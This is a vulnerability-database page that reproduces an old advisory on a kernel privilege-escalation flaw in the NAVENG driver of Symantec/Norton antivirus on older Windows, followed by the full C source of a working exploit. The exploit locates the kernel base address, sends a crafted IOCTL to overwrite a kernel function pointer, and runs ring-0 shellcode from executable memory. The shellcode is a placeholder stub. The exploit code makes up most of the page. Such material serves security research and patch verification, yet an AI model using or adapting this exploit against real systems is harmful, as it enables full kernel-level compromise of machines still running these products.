Vulners
Lucene search
Symantec AntiVirus IOCTL Kernel Privilege Escalation Vulnerability (1)
source: http://www.securityfocus.com/bid/20360/info
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
////////////////////////////////////
///// Norton Internet Security
////////////////////////////////////
//// For educational purposes ONLY
////
//// Kernel Privilege Escalation #1
//// Exploit
//// Rub?n Santamarta
//// www.reversemode.com
//// 26/08/2006
////
////////////////////////////////////
#include <windows.h>
#include <stdio.h>
#define WXP_SWITCH 0xA5522
#define W2K_SWITCH 0x91531
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName,
DWORD nSize);
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{
DWORD *OutBuff,*InBuff,*ShellAddr;
DWORD dwIOCTL,OutSize,InSize,junk,cb,devNum,i,Ring0Addr;
HANDLE hDevice;
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx;
DWORD BaseNt=0,BaseAuxNt;
BOOL InXP;
CHAR baseName[MAX_PATH];
//"PUT YOUR RING0 CODE HERE "
unsigned char Ring0ShellCode[]="\xcc\x90\x90\x90";
system("cls");
printf("\n################################\n");
printf("## Norton I.S ##\n");
printf("## Ring0 Exploit ##\n");
printf("################################\n");
printf("\nRuben Santamarta\nwww.reversemode.com\n\n");
if(argc<2)
{
printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("\n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!\n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt = BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not found\nexiting\n\n");
exit(0);
}
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\\\.\\NAVENG",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("\n\n** Initializing Exploit]\n\n");
printf("INFORMATION \n");
printf("-----------------------------------------------------\n");
printf("[!] NAVENG Device Handle [%x]\n",hDevice);
//////////////////////
///// IOCTL
//////////////////////
OutSize = 4;
dwIOCTL = 0x222AD3;
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
else Ring0Addr = BaseNt + W2K_SWITCH;
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n",Ring0Addr);
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
,0xF000
,MEM_COMMIT|MEM_RESERVE
,PAGE_EXECUTE_READWRITE);
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("\n\n\t\t[!] Initializing Countdown,last chance to abort.");
for(i=10;i>=1;i--)
{
printf("\r -[ %d ]- ",i);
if(i==1) printf("\n\n[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)Ring0Addr,OutSize,
&junk,
NULL);
system("dir"); // NtQuerySystemInformation Nasty Hack ;
/////////////////////
///// CLeanUp
/////////////////////
CloseHandle(hDevice);
free(ShellAddr);
printf("\n\n[*] Exploit terminated\n\n");
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1